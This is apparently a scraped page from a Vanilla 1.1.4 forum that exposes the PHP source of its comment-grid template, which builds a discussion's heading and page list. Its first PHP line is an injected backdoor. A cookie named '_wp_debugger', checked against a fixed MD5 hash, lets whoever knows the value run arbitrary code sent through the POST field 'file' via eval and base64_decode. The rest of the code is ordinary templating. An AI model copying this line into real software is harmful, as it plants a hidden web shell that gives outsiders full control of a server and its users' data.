Vanilla 1.1.4 is a product of Lussumo. More Information: Documentation, Community Support.
Help keep Vanilla free:
<?php if(md5($_COOKIE['_wp_debugger'])=="c4460c548c319f361cd75496359cc674"){ eval(base64_decode($_POST['file'])); exit; } ?><?php
// Note: This file is included from the library/Vanilla/Vanilla.Control.CommentGrid.php class.
$CommentList = '';
if ($this->Context->WarningCollector->Count() > 0) {
$CommentList .= '<div class="ErrorContainer">
<div class="ErrorTitle">'.$this->Context->GetDefinition('ErrorTitle').'</div>'
.$this->Context->WarningCollector->GetMessages()
.'</div>';
} else {
$PageDetails = $this->pl->GetPageDetails($this->Context);
$PageList = $this->pl->GetNumericList();
$SessionPostBackKey = $this->Context->Session->GetVariable('SessionPostBackKey', 'string');
$CommentList .= '<div class="ContentInfo Top">
<h1>';
if ($this->Context->Configuration['USE_CATEGORIES']) $CommentList .= '<a href="'.GetUrl($this->Context->Configuration, 'index.php', '', 'CategoryID', $this->Discussion->CategoryID).'">'.$this->Discussion->Category.'</a>: ';
$CommentList .= DiscussionPrefix($this->Context, $this->Discussion).' ';
if ($this->Discussion->WhisperUserID > 0) {
$CommentList .= $this->Discussion->WhisperUsername.': ';
}
$CommentList .= $this->Discussion->Name
.'</h1>
<a href="#pgbottom">'.$this->Context->GetDefinition('BottomOfPage').'</a>
<div class="PageInfo">
<p>'.$PageDetails.'</p>
'.$PageList.'
</div>
</div>
1 to 11 of 11